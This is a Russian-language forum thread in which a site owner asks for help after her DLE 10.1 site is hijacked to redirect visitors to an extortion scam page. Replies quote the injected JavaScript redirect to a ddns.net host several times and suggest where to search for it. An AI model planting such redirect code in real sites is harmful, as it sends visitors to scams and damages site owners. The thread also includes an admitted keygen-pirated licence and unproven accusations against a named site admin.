kubanochka

Взломали сайт на дле 10.1

93 posts in this topic

Уважаемые форумчане, помогите пожалуйста, У меня взломали сайт. Редиректом перекидывает на какой-то говно домен и где написано, что типа у меня порноматериалы на сайте и я должна оплатить на сот.номер 2000. Звоню на указанный номер - там постоянно недоступно. Понятное дело развод какой-то. Но из-за этого редиректа вообще даже браузер не закрывается, приходится перезагружать ноут. Файлы проверила через файлзиллу, ничего подозрительного не нашла. Посмотрела хтачес, тоже ничего не обнаружила. Подскажите пожалуйста где копать :o

Share this post


Link to post
Share on other sites

провериться сайт на вирусы онлайн.

проверить комп

попросить проверить на вирусы хостинг

Share this post


Link to post
Share on other sites

dinsk.su

У вас в коде страницы, на самом верху встроен скрипт. Вот его и нужно искать (я бы начал с файлов шаблона)

<script>setTimeout( 'location="http://sysprisonlaw.ddns.net/wrn/law.php";', 100 );</script> 

Share this post


Link to post
Share on other sites

В самом верху (возможно в шаблоне) у вас прописан код, вызывающий редирект

<script>setTimeout( 'location="http://sysprisonlaw.ddns.net/wrn/law.php";', 100 );</script>

Можете его удалить, но нужно знать: как он туда попал? Искать в логах...

Share this post


Link to post
Share on other sites

Мда уж!Кое как отвязался от вашей ссылки.

Закажите бэкап у хостера и перезалейте сайт.

Share this post


Link to post
Share on other sites

Посмотрите все js файлы на наличие редиректа. Откройте js файлы блокнотом например, и введите в поиске http и далее поиск.

Откройте все шаблоны tpl и таким же способом ищите ссылки.

 

-если ничего не найдете, обновляйтесь.

Share this post


Link to post
Share on other sites

Не по теме. Всегда считал, что самописанные движки лучше =)

Share this post


Link to post
Share on other sites

Напишите свои контакты в лс. Попробую помочь.

спасибо, щас попробую сама, если не получится напишу вам

 

 

 

У вас в коде страницы, на самом верху встроен скрипт. Вот его и нужно искать (я бы начал с файлов шаблона)

<script>setTimeout( 'location="http://sysprisonlaw.ddns.net/wrn/law.php";', 100 );</script> 

поищу в файлах шаблона сейчас

 

В самом верху (возможно в шаблоне) у вас прописан код, вызывающий редирект

<script>setTimeout( 'location="http://sysprisonlaw.ddns.net/wrn/law.php";', 100 );</script>

Можете его удалить, но нужно знать: как он туда попал? Искать в логах...

в логах смотрела, там пусто, может он их почистил

Share this post


Link to post
Share on other sites

Мда уж!Кое как отвязался от вашей ссылки.

Закажите бэкап у хостера и перезалейте сайт.

Какой бэкап еще? :D  Что бы перезалить с той же вирусной ссылкой?

Share this post


Link to post
Share on other sites

Не по теме. Всегда считал, что самописанные движки лучше =)

Не правильно считаете товарищ. Самописные движки-это полнейший хлам. Или вы считаете, что какой там программист, написал cms лучше, чем огромная команда DLE, Wordpress и т.д.? :D

Эти самописные движки взламывают - как белка орехи грызет.

Share this post


Link to post
Share on other sites

В самом верху (возможно в шаблоне) у вас прописан код, вызывающий редирект

<script>setTimeout( 'location="http://sysprisonlaw.ddns.net/wrn/law.php";', 100 );</script>

Можете его удалить, но нужно знать: как он туда попал? Искать в логах...

 

Скорее всего он там был с самого начала. В 95% паблик сборок DLE и паблик шаблонов спрятаны бэкдоры. Этим делом в основном промышляет админ сайта 8dle.ru - тот еще кулцхакер.

bong likes this

Share this post


Link to post
Share on other sites

Скорее всего он там был с самого начала. В 95% паблик сборок DLE и паблик шаблонов спрятаны бэкдоры. Этим делом в основном промышляет админ сайта 8dle.ru - тот еще кулцхакер.

Именно. Админ сайт DLE http://8dle.ru/ тот еще чмошник. Во все шаблоны ебашит свои редиректы в js файлы.

Share this post


Link to post
Share on other sites

@bong, пред, мат!

Спасибо! :D  С этого дня больше не буду ничего комментировать на форуме.

На этом покидаю вас. Всем спасибо!

Share this post


Link to post
Share on other sites

Не правильно считаете товарищ. Самописные движки-это полнейший хлам. Или вы считаете, что какой там программист, написал cms лучше, чем огромная команда DLE, Wordpress и т.д.? :D

Эти самописные движки взламывают - как белка орехи грызет.

А зачем писать огромную CMS? Можно же просто написать для своего сайта простенький движок с тем функционалом каким надо тебе.

Share this post


Link to post
Share on other sites

А зачем писать огромную CMS? Можно же просто написать для своего сайта простенький движок с тем функционалом каким надо тебе.

Можно просто взять тот же Drupal и вообще ничего не писать.

andstr likes this

Share this post


Link to post
Share on other sites

Можно просто взять тот же Drupal и вообще ничего не писать.

Можно, кто спорит-то...

Share this post


Link to post
Share on other sites

Вопрос к ТС:

У вас Дле официально был куплен? Или была скачана нелегальная копия? Если второй вариант, то не жалуйтесь)))

Share this post


Link to post
Share on other sites

Мда уж!Кое как отвязался от вашей ссылки.

Закажите бэкап у хостера и перезалейте сайт.

вот вот, ссылка просто ужас, это ж надо такое придумать

Share this post


Link to post
Share on other sites

Вопрос к ТС:

У вас Дле официально был куплен? Или была скачана нелегальная копия? Если второй вариант, то не жалуйтесь)))

качала лицензионный дистрибутив. а ключ в кейгене сделала

Share this post


Link to post
Share on other sites

Напишите свои контакты в лс. Попробую помочь.

написала вам в лс

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.